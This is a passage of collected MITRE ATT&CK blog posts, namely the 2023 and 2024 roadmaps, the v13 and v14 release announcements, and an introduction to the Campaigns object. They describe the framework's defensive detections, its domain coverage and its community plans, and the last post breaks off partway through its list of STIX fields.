Our Cloud goal this year is to enable defenders (both new and seasoned) to better leverage the Cloud matrix for defensive action. This includes focusing on emerging and significant threats to the domain, upgrading Cloud analytics, and optimizing the balance between generalization and detail in the matrix.

With a considerable portion of cloud identities retaining super admin access, and the frequency of identity-related intrusions across the domain, we’ve been reinforcing and creating more detailed techniques for identity-based attacks. We’ll also be diving into the exploitation of Continuous Integration/Continuous Deployment (CI/CD) pipelines and the malicious use of Infrastructure as Code (IaC). Our Cloud analytics effort will elevate your actionability, by outlining the steps to detect specific behaviors, and providing additional context on what to find and collect.

We’ll also be evaluating how to best refine the balance between abstraction and specificity in the matrix. Our exploration will assess if the platforms are broad enough to cover a wide range of cloud environments and threats, yet specific enough to inform defensive actions. This balance is crucial for the matrix to remain practical and useful for defenders operating in diverse cloud environments. Our aim is to make navigating the Cloud matrix more intuitive and enable users to prioritize techniques relevant to their specific platform.

Ready to navigate the Cloud with us? Sail over to #cloud_attack.

macOS/Linux | Countermeasures for Priv Esc and Defense Evasion

Our goal for Linux and macOS is to equip practitioners with more robust countermeasures and help bridge the information gap on defending these systems. We’ll continue tracking down in-the-wild adversary behaviors and building more macOS and Linux-only (sub)techniques to optimize defensive arsenals. For Linux we’ll be exploring privilege escalation and defense evasion to better align with in-the-wild adversary activity. On the macOS side, we’ll be strategically bolstering the platform, with a particular emphasis on threats associated with elevated permissions.

If you have intelligence or technique ideas, we would love to collaborate. We rely on the practitioners who work with these systems day-in and day-out to help us identify gaps and provide invaluable insights. Ready to contribute? Email us and join our #linux_attack or #macos_attack Slack channel.

Defensive Coverage | Upgrading, Converting & Restructuring Defensive Measures

Our Defensive goal this year is to expand detections and mitigations to help you better optimize your detection engineering — and maybe get a little more actionable. The April release will include both new and updated mitigations that incorporate best practices from contributors, and industry standards meticulously mapped by our defense team.

Over the past few months, we’ve also been examining analytic language approaches. Our aim? Transforming detection logic into formats compatible with different security tools, and more consistent with real-world query languages such as Splunk’s. This will simplify the process of aligning your SIEM data with ATT&CK detections, making it easier to understand. We’re also incorporating data collection sources for a given detection query, for example, pulling information from Windows Event logs or Sysmon and the associated Event Code. The new analytic style in ATT&CK will overhaul the previously used CAR-like pseudocode, and will be the model for future analytics. This will enhance compatibility across various environments and help you hunt threats more efficiently.

Lately, we’ve been prioritizing improving detections under the Execution tactic, where some of the most employed techniques fall. v15 will showcase a subset of these enhanced detections, featuring the trifecta of CAR (Cyber Analytics Repository) pseudocode, BZAR-based analytics (Bro/Zeek ATT&CK-based Analytics and Reporting) and detection notes.

Gearing up for October, we’ll be completing the enhanced detections for Execution, sculpting out Credential Access detections, exploring the universe of Cloud analytics, and navigating how to restructure our data sources for improved accessibility. This means sprucing up data source definitions and matching them to everyday use cases like sensor mappings. This way, you can more easily identify the tools and events that clue you in on shady activity. Additionally, you can opt for the data sources that best align with your specific needs. The revamp will also include the introduction of STIX IDs for data components, making it more intuitive to reference and integrate data sources.

Join our ranks at #defensive_attack channel.

ICS | Subs, Asset Expansion, & Cross-Domain Integration

ICS is leveling up this year. Our goals include broadening ICS horizons with new asset coverage, exploring platform scope expansion, and continuing our multi-domain integration quest. We’ll also be diving deeper into adversary behaviors with the introduction of sub-techniques. v15 will showcase some of our integration efforts, with the release of cross-mapped campaigns. These campaigns track IT to OT attack sequences, helping defenders better understand multi-domain intrusions and informing unified defense strategies across technology environments.

The October release will feature a structural shake-up, with the first tranche of the long-awaited sub-techniques. Like Enterprise and Mobile sub-techniques, ICS subs will break down techniques into more detail. This increased granularity allows defenders to understand the nuances of adversaries’ execution of a given technique, enhancing their ability to detect and mitigate them. The technique restructuring will involve modifying the name and scope of techniques and integrating them more effectively with other domains. This integration will foster a more comprehensive defensive approach on both the right and left of launch. You can expect a subs crosswalk to help you understand our decisions and how things map between deprecated and new techniques.

October will also include some additional treats with Asset coverage expansion, building upon the Asset refactoring in v14. The refactoring strived to provide a clearer picture of the devices, systems, or platforms a specific technique could target and introduced the concept of Related Assets. Related Assets links cross-sector Assets that share similar functions, capabilities, and architectural locations/properties, highlighting that they may also be susceptible to the same techniques. v16 will feature additional Related Assets, as well as more in-depth definitions and refined mappings of technique relationships for different devices and systems. You can start leveraging Assets for your defensive activities by viewing the technique mappings from Asset pages, or by reviewing Asset mappings from a technique page. We’ll also be scouting how to incorporate additional sectors such as maritime, rail, and electric.

We welcome input from all sectors on how to improve identification of key assets and any additional adversary behaviors you have observed in the wild. Reach out to us at [email protected] or #ics_attack.

Mobile | Detections & Mitigations Optimization + PRE Exploration

Mobile’s goal is to dial up the pre-and-post-compromise defensive measures this year, with a detections and mitigations upgrade and an exploratory mission into pre-intrusion behaviors for the matrix. We introduced Mobile structured detections in v14 and will continue building out structured detections as well as expanding our mitigations across the matrix. For optimal actionability, we’ll be leveraging the best practices and tangible experiences from the mobile security community.

In the coming months we’ll also be evaluating how to enhance inter-domain connectivity across platforms and exploring integrating proactive tactics into the Mobile matrix. Our goal is to better reflect evolving adversary activity targeting the domain. This research quest will examine adversary actions before attacks, like active and passive Reconnaissance, and acquiring or developing resources for targeting purposes.

Collaboration and knowledge-sharing with the community will continue to be a driver for Mobile’s development in 2024. In addition to ramping up detections and mitigations, we’re particularly interested in partnering with mobile defenders to examine potential areas where communications platforms or domains could be added into ATT&CK. If you’re interested, connect via [email protected] or join #mobile_attack.

Software Development | Enhanced Usability & Streamlined Workflows

Our Software goals this year are to increase usability across ATT&CK Workbench and Navigator, and streamline Groups and Software releases. Adversaries evolve quickly, so we’re optimizing Workbench workflows to harmonize Group and Software releases more closely to their cadence. This includes developing enhanced search capabilities, improving ATT&CK object-collection association, and overhauling the Collection Manager UI for the ATT&CK Workbench. These renovations will fine-tune the approval of ATT&CK object changes and the matching of collection bundle differences with official ATT&CK changelog types, resulting in swifter releases.

For ATT&CK Navigator, we’re refining the user experience, and the experience of anyone reading your reports. We’ll be upgrading SVG export function for sleeker output designs, providing smoother navigation with intuitive export controls, and rolling out an in-website tutorial for mastery of all the key features. We’ll also be updating the official content source to the STIX 2.1 repository — making everything a little more robust and flexible.

Finally, we’re taking our TAXII server to the next level! We’ll be sunsetting the TAXII 2.0 server by December 18, as we transition to the upgraded TAXII 2.1 version. You can access the documentation for TAXII 2.1 server in our GitHub repository. Remember to switch URLs for TAXII 2.1 clients to connect to https://attack-taxii.mitre.org instead of https://cti-taxii.mitre.org. And get ready to experience enhanced features and smoother operations.

Cyber Threat Intelligence | More Cybercriminal, Underrepresented Groups

With CTI, our mission is to better reflect the reality of the threat landscape by infusing more cybercriminal and underreported adversary activity into the framework. By bridging gaps in representation and minimizing those unknowns, we aim to provide defenders with better insights and tools to counter a wider array of threats. A pivotal aspect of this effort includes gap assessments of Groups, Software, and Campaigns. These evaluations will help us pinpoint any disparities between the current content and the reality of adversary activities.

Our releases this year will feature more cybercriminal operations and under-monitored regions, including Latin America, offering a more nuanced understanding of global threats. We’re also collaborating with ATT&CK domain leads to expand coverage of cross-domain intrusions to inform a more unified approach to undermining adversaries.

To join this quest, engage at [email protected].

Community Collaboration

ATT&CK Community Workshops | Practitioner-led Forums for Activating ATT&CK

We’re always inspired to see how ATT&CK is being used in innovative ways to upgrade defensive capabilities. The regional ATT&CK community workshops — organized by practitioners, for practitioners — provide forums to share insights, use cases, and collaborative approaches for leveraging ATT&CK.

ATT&CKcon 5.0 | Great Speakers, Content, & Conversations around ATT&CK

ATT&CKcon 5.0 will be arriving in October, featuring both virtual and in-person attendance from McLean, VA. Stay tuned to our Twitter and LinkedIn channels for updates on our Call for Presentations, which will open in the coming months, followed by our illustrious speaker lineup. If your organization is thinking about joining the ATT&CKcon adventure as a sponsor, please reach out to us at [email protected].

Benefactor Program | Empowering Defenders, Sustaining Independence

We want to take a moment to share some insights into the foundational tenets and financial realities of ATT&CK. Much like we crowd-source intelligence and rely on community contributions, ATT&CK itself was built to be independent, responsive, and part of the global community.

From the outset, we deliberately chose not to align ATT&CK with any specific government department or agency. This decision was made to maintain autonomy, flexibility, and to foster collaboration across the broadest spectrum of stakeholders. While this approach has facilitated agility and international partnerships, it also means that ATT&CK lacks a dedicated funding source.

To bridge this funding gap and ensure the continuity of our operations, as well as expanding into new domains, we launched the Benefactor Program last year. This program enables tax-deductible, charitable donations from individuals and organizations who believe in ATT&CK’s mission. These contributions allow us to continue offering free and accessible services while also advancing our capabilities and scope.

We are immensely grateful for the support we have received thus far from initial benefactors SOC Prime, Tidal Cyber, and Zimperium. We remain committed to serving the community with transparency; whether you’re a contributor, a fellow defender, or just getting started, we thank you for being part of ATT&CK’s journey.

Looking Forward

Mark your calendars for the v15 release on April 23! You’ll see some novel content interspersed with familiar elements, as well as more practical defensive measures.

As always, we value the opportunity to collaborate with you in ensuring that ATT&CK remains a living framework, where each contribution, conversation, or new implementation fuels its evolution. We look forward to continuing this adventure with you.

Connect with us on email, Twitter, LinkedIn, or Slack.

©2024 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 24–00779–2.


ATT&CK 2024 Roadmap was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.

ATT&CK v14 Unleashes Detection Enhancements, ICS Assets, and Mobile Structured Detections

Credit: https://flic.kr/p/dzyK9x CC BY-SA 2.0

ATT&CK has been brewing up something eerie for this Halloween — a release so hauntingly powerful that it will send a chill down the spine of even the most formidable adversaries. As v14 emerges from the depths, we’re proud to present a more robust and finely-tuned knowledge base. So, grab your flashlights and keep your wits about you as you navigate the latest changes, including enhanced detection guidance for many techniques, a (slightly) expanded scope on Enterprise and Mobile, Assets in ICS, and Mobile Structured Detections.

For the rest of our regular updates/additions across Techniques, Software, Groups and Campaigns take a look at our release notes, our detailed changelog, or our changelog.json.

Detection Upgrade with Analytics

In ATT&CK v13 we started adding “detection notes” and pseudocode analytics from CAR (Cyber Analytics Repository) directly into some detections. In v14 we’ve dramatically expanded the number of techniques with a new easy button and added a new source of analytics. One focus this release was Lateral Movement, which now features over 75 BZAR-based analytics! BZAR (Bro/Zeek ATT&CK-based Analytics and Reporting) is a subset of CAR analytics that enable defenders to detect and analyze network traffic for signs of ATT&CK-based adversary behavior. Moving forward, we plan to continue working across tactics to enhance detection approaches.

Example BZAR-derived Analytic

Also new: enhanced relationships between detections, data sources, and mitigations. Improving techniques is a collaborative and iterative process, and we work with the community to identify new procedures and enhance data sources and mitigations. This release includes updated technique alignments to data sources and mitigations, better reflecting the most effective defensive measures for the impacted techniques.

Jump into the #defensive_attack channel to be part of the action.

Enterprise’s New(ish) Frontier

Since its inception, ATT&CK has been dynamic, designed to catalog, categorize, and adapt to real-world adversary behaviors that primarily involve direct interaction with devices, systems, and networks. Over the past decade, this adaptability and focus has empowered defenders through consistent, threat-informed resources. As adversaries continually evolve their exploitation of human vulnerabilities, ATT&CK has expanded its scope with this release, encompassing more activities that are adjacent to, yet lead to direct network interactions or impacts. The increased range incorporates deceptive practices and social engineering techniques that may not have a direct technical component, including Financial Theft (T1657: Financial Theft), Impersonation (T1656: Impersonation), and Spearphishing Voice (T1598.004: Phishing for Information: Spearphishing Voice).

Think some behaviors are still missing? Your input remains essential as we continue to expand ATT&CK’s horizons and refine content to match advancing adversary tactics. Email or Slack us what you’re seeing.

Assets Join the ICS Arsenal

We’ve been working on Asset refactoring for a while, and we’re thrilled to introduce the results of our initial efforts. v14 features 14 inaugural Assets, representing the primary functional components of the systems associated with the ICS domain. These Asset pages include in-depth definitions, meticulous mappings to techniques, and a list of related Assets. Our primary goals for Assets are to provide a common language for inter-sector communication, and to empower underrepresented sectors to leverage ATT&CK mappings, fostering meaningful communication about risks and threats. You can also now find Assets on the ATT&CK Navigator.

The Data Gateway Asset

The Assets refactoring process involved an in-depth review of relevant CTI, researching and refining the resulting definitions based on industry standards, and analyzing how the device features map to ATT&CK Techniques. We look forward to leveraging the deep insights from our industry partners as we continue refining and expanding Assets.

A Partial List of Assets

If you’re interested in contributing, head over to the recently created #ics_attack channel.

Reeling in Mobile Threats with Phishing & Structured Detections

With Enterprise increasing its scope a bit, Mobile has also expanded its coverage to include Phishing (T1660: Phishing), which encompasses phishing attempts through vectors including SMS messaging (“smishing”), Quick Response (QR) codes (“quishing”), and phone calls (“vishing”). Mobile Phishing features a new mitigation (M1058: Antivirus/Antimalware), to enhance anti-virus and malware defenses. Also introduced with this release are Mobile structured detections, which allow you to explicitly see the required inputs (Data Sources) for each detection, along with how to analyze the data to identify a specific Technique (detection). Structured detections are part of the ongoing endeavor to bring Mobile to parity with Enterprise.

Next up? Refining existing mitigations and working with the Mobile security community to identify new content. Get involved at #mobile_attack.

Enhancing Your Website Navigation Experience

We’ve refined the navigation bar of the ATT&CK website, streamlining its structure and content to enhance the user experience and overall ease of navigation. Over time, our navigation bar accumulated a lot of ‘stuff’, and we hope this update strikes a balance between necessary links and user needs. The updated navigation bar features a single dynamic menu display, with access to secondary links (most previously featured on the primary bar) in associated dropdown menus:

Love it? Hate it? Let us know.

Looking Forward

We want to extend our deepest gratitude to the heroes of this release — our dedicated contributors. Your relentless commitment to enhancing collective defenses is the true magic behind ATT&CK. As 2023 draws to its end, let’s keep the collaboration alive, because together, we’ll continue to ward off the threats that go bump in the night. Stay vigilant, stay curious, and stay safe — and remember, with ATT&CK, every day is a day to keep adversaries at bay.

As always, connect with us on email, Twitter, or Slack.

©2023 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 22–00745–2.


ATT&CK v14 Unleashes Detection Enhancements, ICS Assets, and Mobile Structured Detections was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.

ATT&CK v13 Enters the Room

ATT&CK v13 Enters the Room: Pseudocode, Swifter Search, and Mobile Data Sources

It’s not like a regular Tuesday, it’s a lucky Tuesday — ATT&CK v13 has arrived. As we outlined in our Roadmap, we’re working toward enhanced tools for lower-resourced defenders, improving ATT&CK’s website usability, enhancing ICS and Mobile parity with Enterprise, and evolving overall content and structure this year. ATT&CK v13 is bringing some analytics pseudocode, Mobile-specific data sources, key website updates, ICS Asset refactoring, and more Cloud and Linux coverage. For the rest of our regular updates/additions across Techniques, Software, Groups and Campaigns take a look at our release notes, our (new) detailed changelog, or our (new) changelog.json.

Defensive Easy Button: Pseudocode for Detection

This release features a new defensive ‘easy button’, with the addition of CAR pseudocode to a number of our data components. These pseudocode analytics add more context on what you should find and collect, by describing at a high level the steps involved in detecting certain types of behaviors. You can use these analytics as a blueprint for your custom detections, leaving you with more time to spend on the defensive activities of your choice.

Moving forward we’ll be revamping Mitigations and improving defenses tactic-by-tactic, by incorporating analytics from CAR and dynamic research into the data components falling under a given tactic. If you’d like to join our efforts, let us know or join us in the #defensive_attack channel.

ATT&CK’s Infrastructure: ATT&CK Search 2.0 and changelog.json

Two of our most frequently requested items are now here: faster search and machine-readable changelogs!

We’ve all experienced the patience-building opportunity associated with using the ATT&CK website search, so we’re thrilled to finally introduce a new and improved search! While it won’t be breaking the sound barrier anytime soon, it will save you some serious time when you’re trying to figure out which techniques cover Import Access Table. Your initial search with the enhanced version will be in the 5-second range, with following queries resolving near instantaneously. We’ll continue to adjust this important feature and appreciate all of you who stayed with us through the search bar trials. Let us know if you spot any new corner cases!

Another significant addition to this release is a machine-readable changelog. You’ll now be able to access and parse through the changelog, quickly identifying and integrating the updates. For more details check out the changelog.json format details in our GitHub. Our release notes format has also been improved, now documenting New, Major Version Changes, Minor Version Changes, and Patches for each of Techniques, Mitigations, Data Sources, Data Components, Software, Groups, and Campaigns. If you’re wondering what “Patches” are, it’s what we’re calling changes so minor (e.g., typos, URL fixes, grammar) no version update was necessary.

We don’t expect quite as much celebration for our ATT&CK Navigator updates, but new updates coming with ATT&CK v13 enable you to further customize your layer colors, scoring, image orientation and preset image sizing — for more details, check out the Navigator release notes (click on the ? in the top right of Navigator).

Mobile: Data Sources are Live

On the Mobile front, you’ll now be able to access Mobile-specific Data Sources! Mobile has joined the filter list along with Enterprise and ICS, enabling you to toggle between the data sources for your chosen domain(s). In addition to the new Mobile-specific sources, the cross-domain mappings with Enterprise are now more accessible. The Mobile-specific and cross-mapped sources are also listed on the individual Data Source pages.

Over the next few months, we’ll continue to add to our Mobile data sources, as well as architecting structured detections. If you’d like to contribute to this space or start a conversation, email or slack us (don’t call).

ICS: Asset Refactoring for Enhanced Coverage

The ICS matrix features new techniques, a freshly cross-mapped campaign, and updates to Assets (the functional components of the systems in the ICS domain). Our Assets refactoring effort seeks to align how different industries describe assets, in order to better map device functionality to core dependencies and associate the Assets to the relevant techniques. Through this effort we’ve also been working to address gaps from underreported industries. We’ll continue to collaborate with the ICS community to better build out and describe assets and create these mappings. Our goal is to include Assets in the metadata box on technique pages to help inform defenders about a device’s susceptibility to techniques.

Campaigns: Criminals, APTs and Cross-Mappings

Our Campaigns game is going strong, with v13 showcasing a blend of recent cyber intrusions and those previously captured in a Group page. A couple of our more contemporary entries include APT41’s compromise of U.S. state government networks (C0017), and an AvosLocker ransomware-as-a-service operation (C0018). Some of the older activity previously featured in Groups, include APT29’s Operation Ghost and the SolarWinds compromise. The star of this release, and one we’re particularly excited about, is the cross-domain Campaign entry, the 2016 Ukraine operation by Sandworm Team. Over the next several months, we’ll continue to focus on criminal group operations and expanding on the hybrid Campaigns that traverse domains.

Cloud: Now with More Exec and LatMo Coverage

We assessed known gaps in the Execution and Lateral Movement tactics of the Cloud matrix and built out additions to address some of the disparities. These changes feature contributions from an ongoing partnership with the Cloud community to better represent behaviors in and against Cloud technologies, as well as reflecting how organizations are using Cloud in their operations. In the coming months, we’ll continue to expand coverage in these not-so-easy-to-capture cloud-related tactics, as well as evaluating where to develop more Exfiltration coverage.

Our end goal this year is to ensure that everyone can more effectively utilize ATT&CK for Cloud. If you have ideas or contributions to share, please email us or drift by the #cloud_attack channel on the ATT&CK slack.

Linux: Making the Penguin a Little More Secure

Our Linux team has spent the last few months going through contributions, coordinating with contributors, and navigating through open-source reporting for in-the-wild adversary behaviors. This release includes updated and new Linux-only (sub)techniques that will enhance the Linux defender’s toolset. We’ll continue building out Linux coverage in ATT&CK, as well as gaining a better understanding of the adversaries operating in this space. If you’d like to work with us or to join our very exclusive Linux channel (#linux_attack), we’d love to have a conversation.

Next Up: v14 and ATT&CKcon

We know you’re still trying to catch your breath from all the v13 adjustments, but we’re still sprinting for v14! October’s release will feature upgraded coverage across domains, renovated mitigations, new cross-domain mappings, more pseudocodes, and Mobile structured detections.

We’ll also be releasing more details on ATT&CKcon 4.0 soon (October 24–25), so start getting ready with some light reading/watching of previous ATT&CKcon presentations or couch interviews.

As always, we look forward to connecting with you on email, Twitter, or Slack.

©2023 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 22–00745–1


ATT&CK v13 Enters the Room was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.

2023 ATT&CK Roadmap

A Roadmap of 2023’s key efforts: From ICS Assets to more Linux and ATT&CKcon 4.0.

It’s 2023 and we’re all a little older, including ATT&CK, which will be celebrating its 8th (!) release anniversary in a few short months. Last year we matured, expanded, deconflicted, and renovated the knowledge base, persevering through challenges to meet our 2022 goals. Some of our most notable efforts included unveiling Enterprise structured detections, publishing Mobile sub-techniques, introducing ICS detections, transitioning ATT&CK for ICS to the mothership (aka attack.mitre.org), launching Campaigns, and hosting ATT&CKcon 3.0.

The ATT&CK team also trekked around the U.S. and the globe to talk about ATT&CK for defenders, threat hunters, and cyber threat intelligence analysts. We held riveting conversations about purple teaming, discussed best practices for adversary emulation, and connected over common misuses of ATT&CK. You inspired us with your stories, insights and expertise, and we’re thrilled to continue collaborating with you in 2023.

2023 Roadmap

Our focus areas in 2023 will be targeted growth and integration. We’ll be maintaining framework stability as we build out content and structure, while expanding and increasing the scope of some of ATT&CK’s current platforms. We’ll be looking for places where we can add defensive “easy buttons” to ATT&CK and other ways we can improve for lower-resourced defenders. Relatedly, we’ll also be working to enhance the usability, accessibility, and functionality of the ATT&CK website and Navigator. These updates and more will be mainly centered on our April and October releases.

Linux | April & October 2023

We made significant progress in updating the macOS platform last year, and while we’ll continue evolving that content, we’ve officially transitioned the spotlight to Linux for 2023. April’s release will feature Linux contributions (thank you, contributors!) that focus on modifications to parent technique scope, including new sub-techniques and updated procedures.

For the October release, we’re targeting an expanded representation of Linux within ATT&CK. We’re looking to not only better account for activity within on-premise Linux servers, but some of the broader Linux-based (and not always x86) spaces adversaries have been abusing. This will be a substantial effort given how underreported Linux activity is, and the Linux security community’s input is essential for us to improve this platform. We’re working to build out opportunities to connect both online and offline and would like to hear how you’d like to collaborate. In the interim, whether you have specific insights to share, or would just like to talk about ATT&CK for Linux in general, email us and join the #linux_attack channel on the ATT&CK Slack.

Defensive Coverage | October 2023

When we added explicit pairing of detections to data sources in ATT&CK v11, it was intended to let you identify the inputs you need to collect (Data Sources), combined with how to analyze that data to identify a given Technique (detection). We’ll be leveling up this year, exploring and including in ATT&CK more specifics on what you as defenders can be collecting related to detections and how. This quest will result in more directly usable guidance for defenders, as well as a more in-depth look at data collection, analysis, and identification of a given technique.

We will also be assessing ATT&CK mitigations for gaps and potential improvements this year. We converted mitigations into objects in v5 to increase their usability, and our goal has always been to continue to evolve and improve that knowledge base. Over the next several months, we’ll be researching new preventions and crafting additional ways to prevent a given technique from succeeding. If you’d like to contribute to either of these quests, let us know or join us in the #defensive_attack channel in our Slack.

ICS | April & October 2023

This will be ICS’s first full year on the ATT&CK site, and we’ll be making additions across the matrix, including more cross-domain mappings (e.g., ICS + Enterprise). We’ll be sharing more details about this and our approach to leveraging ATT&CK for holistic ICS defense in an upcoming blog post.

Over the next several months, we’ll be focusing on addressing overlaps and integration with other domains (primarily between Enterprise and ICS, although Mobile could be included) and revamping ICS Assets. This effort will focus on evaluating Assets in various industries, identifying their interrelations, and determining how they fit into the ATT&CK structure.

If you’d like to share contributions or have other inputs for ICS, connect with us!

Mobile | April & October 2023

We released Mobile sub-techniques last summer, and we’ll continue expanding on those, as well as building out contributions, and collaborating on enhancing multi-domain techniques. Mobile-specific Data Source objects are another goal this year, and they’ll mirror the concept of Data Source objects that Enterprise and ICS currently leverage, informing a more detailed and defined data collection strategy. The Mobile Data Sources will eventually be featured on both the overall Data Sources list as well as the individual Data Source pages. For October, we plan on charting out structured detections, to enable you to enhance your Mobile detections approach.

A core focus for the domain overall is bolstering our collaboration with the mobile security community. Along with the rest of ATT&CK, Mobile’s matrix is mostly crowdsourced, and we rely on the deep expertise from the mobile community to validate our content and help us to mature this knowledge base. If you’d like to contribute to this space or start a conversation, reach out to partner with us.

Campaigns | April & October 2023

We don’t typically highlight all the updates we’ll be making to ATT&CK Techniques, Software, or Groups, but as the newest object on the block, we figured you might be curious about our plans for Campaigns this year. Over the next few months, we’ll be extracting significant Campaigns from several APT groups in ATT&CK and adding them to the knowledge base. Closer to October, we’ll pivot to building out campaigns conducted by criminal groups, including ransomware operations. If you’d like to contribute or just share your thoughts on Campaigns, let’s have a conversation!

Cloud | April & October 2023

Since initially releasing ATT&CK for Cloud in October 2019 (v6), we have continually worked to expand and refine how these platforms fit within the broader ATT&CK for Enterprise. Cloud introduces many new challenges for defenders, as well as potential opportunities to rethink how we describe adversary behaviors. For example, how does our understanding of tactics such as Execution, Lateral Movement, and Exfiltration change when considering cloud environments?

Throughout 2023 we will work to adapt these definitions with the goal of helping everyone (cloud expert or not) better understand and utilize ATT&CK for Cloud. As always, if you have specific insights or relevant ideas to share, please email us and join the #cloud_attack channel on the ATT&CK Slack.

ATT&CKcon 4.0 | October 24–25, 2023

Whether you’re a sophisticated ATT&CKer, a hobbyist, or you’re just getting started, we’d love to connect with you at ATT&CKcon 4.0! We’ll be hosting 4.0 in-person and virtually from McLean, VA October 24–25 this year. Watch our Twitter and LinkedIn for announcements on our CFP when it opens in the next few months, followed by our lineup of speakers in late summer. If your organization is interested in sponsoring ATT&CKcon, drop us a line at [email protected].

Here’s to (all) of You

We received an exceptional number of contributions across domains and platforms last year and are incredibly grateful for the support. ATT&CK will always be community-driven and we’d like to thank each and every one of you that took the time to submit contributions, share research and new use cases, and join us in innumerable ATT&CK discussions.

We’re looking forward to another great year of collaboration and can’t wait to connect with you in-person or via email, Twitter, or Slack!

©2023 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 22–00744–16.


2023 ATT&CK Roadmap was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.

Introducing ATT&CK Campaigns

Introducing Campaigns to MITRE ATT&CK

By: Amy Robertson, Jared Ondricek, and Matt Malone

We’ve talked about building Campaigns into ATT&CK in our ATT&CK 2022 roadmap, at ATT&CKCon 3.0, and most recently on the SANS Threat Analysis Rundown but their release is now nigh! Our initial collection of Campaigns will be available starting with our ATT&CK v12 release on October 25, when you’ll be able to leverage the Campaigns structure for all of your ATT&CK use cases. Prior to the release, we’re taking the opportunity to walk you through our vision for Campaigns, give you a tour of Campaigns elements, and cover our longer-term Campaigns plans.

The Campaigns Vision

For our purposes in ATT&CK, we use “Campaigns” to describe a grouping of intrusion activity conducted over a specific period of time with common targets and objectives. A key aspect of Campaigns is that the activity may or may not be linked to a specific threat actor.

Our vision for Campaigns is to provide users with another way to view the evolution of malicious cyber operations. Threat actor activity in ATT&CK currently encompasses a broad set of behaviors that can inform a holistic picture of the adversary over time. But as adversaries evolve, their TTPs often change, and by introducing some structure with Campaigns, we hope to allow you to glean more actionable intelligence and context to inform your defense prioritization. Campaigns will enable you to identify trends, track significant changes in techniques used by various actors, and monitor the introduction of new capabilities (or exploited vulnerabilities). You’ll also be able to identify continued threat actor reliance on certain techniques regardless of the campaign objective and/or targets.

Campaigns will also allow us to more accurately categorize complex intrusion activity, including activity involving multiple threats (such as Ransomware-as-a-Service operations), and to parse out overlapping operations that have been given the same name. With the new structure, we’ll also be converting some of the Groups in ATT&CK to Campaigns. This will apply to Groups that meet our definition of a Campaign and only feature one cluster of activity (such as G0101/Frankenstein and G0014/Night Dragon).

In keeping with our tradition of carefully integrating structural elements in ATT&CK, we’ll be incorporating a limited number of Campaigns into the v12 release. This initial collection of Campaigns will feature former Group entries that are more accurately categorized as Campaigns, a curated number of Campaigns linked to existing Groups, as well as unattributed Campaigns.

Campaign Elements

We structured Campaigns to visually align with Groups and Software pages, and the v12 release will add a new “Campaigns” button to the main page tool bar for easy access.

Figure 1: Example of the new ATT&CK tool bar with the “Campaigns” button.

The Campaigns homepage will include a Campaigns table featuring ID number, Name, and activity descriptions. The list of available Campaigns in the left column highlights the Campaigns added or converted to date. As we previously covered, we created some flexibility in terms of whether or not the activity was given a unique name — a limitation we currently face with Groups — by allowing a Campaign to be simply referenced by our own identifier (e.g., C0014) if it doesn’t already come with a name.

Figure 2: A draft Campaign table, with unnamed activity referenced as C0014.

Each Campaign entry will feature a description of the intrusion activity, including details like known targeted countries and sectors where available, as well as any information that makes this Campaign particularly noteworthy.

Figure 3: A draft Campaign page for all of the Trekkies out there!

Something we’ve been particularly mindful of is how to best capture the period of time related to a Campaign. We opted for the “First Seen” and “Last Seen” fields in the information box, with the corresponding reference citations, so users can see how a Campaign was scoped. For intrusion activity assessed to be ongoing at the time of report publication, we’ll add language to that effect in the Campaign description (e.g., “As of September 2022 security researchers assessed this activity was ongoing”) and update future versions of ATT&CK Campaign entries accordingly.

Figure 4: An example Campaigns information box with time frame fields and citations.

As with Groups and Software, we’ve created a “Techniques Used” table to capture actor procedure examples observed during a Campaign, with a couple of significant differences.

1. We’ll add as much detail as reporting allows regarding specific commands or steps taken by the actors, to help ATT&CK users identify corresponding detection and mitigation opportunities. We’ve found this concept to be more challenging for Group and Software pages, as those tend to aggregate a variety of reporting examples over time, resulting in more generic procedure example language.

2. We’ll preface our Campaign procedure examples with the Campaign name or associated ID number, to separate it from techniques already found on a Group page. We realize the utility of this may not be immediately evident while looking at a Campaign page, but this allows for the procedure examples to stand out separately when a Campaign is associated with a Group (and, hopefully, allows for smoother integration in the future if an unattributed Campaign is later attributed to a Group).

Figure 5: Separate procedure examples as seen from a Group page, based on a fictional Campaign. The top line is the existing procedure example for T1566.001 for a Group, while the second line is specifically related to the associated Campaign.

What does this mean for Groups and Software?

We’ve made two key changes to Group and Software pages as they relate to Campaigns. As previously mentioned, techniques and corresponding procedure examples mapped to a Group-attributed Campaign will carry over to the associated Group page. We’ll also continue to map Campaign-specific procedure examples to Software pages.

We’ve added a Campaigns table to associated Group and Software pages, so ATT&CK users can easily reference Campaign ID numbers, Names (when applicable), and the Campaign description.

Group and Software pages will otherwise remain visually unchanged, and we’ll continue to update them separately as a collective list of all observed techniques. We want to preserve the functionality of ATT&CK Navigator Layers in that respect, for ATT&CK users who want to focus on all techniques used regardless of time or target.

Introducing the Campaign STIX Object

With the addition of Campaigns to ATT&CK, the ATT&CK Data Model (which can be found in our Usage document) has expanded to encompass these changes. The diagram below portrays how all the moving pieces work together, with the new additions of the Campaign object type and the Relationships connected to Campaigns. It’s important to note that there are no changes to objects that previously existed in ATT&CK. Software written to read earlier versions of ATT&CK should continue to work, albeit missing data that only appears in Campaigns.

Figure 6: Campaign STIX relationships

Now that you’ve seen our data model, we’d like to introduce you to the star of the show — the STIX Campaign object. As a part of the ATT&CK Data Model, it makes use of the same STIX extensions that can be found there, such as x_mitre_version. However, in addition to those previously documented fields, here is the breakdown of how ATT&CK utilizes each field that is unique to the Campaign object:

Standard STIX fields:

  • type: Follows the STIX specification
  • name: The name used to identify the Campaign. If no name is given, then this field will contain an ATT&CK identifier in the form CXXXX
  • description: Follows the STIX specification
  • aliases: Used to hold associated Campaign names
  • first_seen (timestamp): The time that this Campaign was first seen. ATT&CK makes use of this field only to the level of granularity of month/year. The day and time part of this timestamp field should be ignored by parsers when displaying ATT&CK Campaign information
